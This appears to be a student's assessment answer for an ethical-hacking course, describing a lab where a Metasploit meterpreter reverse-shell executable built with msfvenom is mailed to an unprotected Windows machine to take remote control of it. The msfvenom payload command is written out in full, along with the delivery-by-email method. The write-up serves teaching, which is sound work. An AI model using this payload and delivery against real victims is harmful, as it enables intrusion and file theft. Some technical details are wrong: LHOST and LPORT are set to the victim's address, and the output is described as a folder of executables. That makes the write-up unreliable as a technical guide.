Csi3508 Ethical Hacking And Defence Assessment Answers

Answer:

In the workshop, we came up with Kali Linux Metasploit exploit whose target would mainly be on the windows operating systems (windows XP, 7, 8, 8.1 and 10). This exploit would enable an attacker get into the victim’s machine and do a number of operations just as if logged in. metasploit is basically a project that helps in penetration testing and development of ID signatures. The tool helps in the development of an exploit code as well as its execution in a targeted remote machine (Dieterle, 2016).

For this test our requirements were; a metasploit framework with the entire Ruby packages which we installed in a Kali Linux Operating system computer, two machines, one with a windows operating system and another with a Kali Linux OS. The two machines were allowed to operate in the same NAT network. Because an antivirus would prevent the attack, we ensured that the target machine did not have any antivirus software (Holik, Horalek, Marik, Neradova & Zitta, 2014, p.240). The Metasploit command which we used throughout our penetration test was the Msfconsole simply because of its flexibility and other additional features which supported the tools within the framework.

For us to be in a position to penetrate into the second machine which was operating on a windows platform, we first had to be aware of the machine’s IP address and one of its free PORT numbers which we easily acquired considering that the two machines were operating in the same network. An IP address of a machine operating within the same network can be obtained easily using software called Netcut (Muniz, 2013).

Now to get a chance of penetrating into the second machine, we first of all created an executable file within the Kali Linux platform under the IP address and PORT number specification of the second machine using the command “msfvenom –p windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine) LPORT= (PORT in the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”

The command allowed us to create an executable folder in the Kali Linux platform and which contained several .exe files. This is the collection of files which we were supposed to send to the target machine through channels line mail or else through the network (Pritchett & De Smet, 2013).

After we send the file to the target machine, we were entitled to activate our metasploit framework into a listening status using the “exploit” command at the Msfconsole handler status. So, when it’s set on a listening mode, it waits until the file send to the victim machine is opened. When the file sent to the victim machine is eventually opened by the victim, on the side of Kali Linux platform “meterpreter” activates itself automatically.

At this juncture, the attacker is inside the victim’s machine and can carry out several operations with full control just like a person who has logged into the system physically. Some of the activities the attacker can do on the victim’s machine include reading the contents of the files on the screen, changing directories, editing files, deleting files, searching for files, uploading files changing local directories, printing local directories, removing directories, moving source to destination, and printing working directories (Weidman, 2014). This implies that the attacker has already hacked into the victim’s computer.

References

Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent Publishing Platform.

Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective penetration testing with Metasploit framework and methodologies. In Computational Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp. 237-242). IEEE.

Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.

Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd

Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.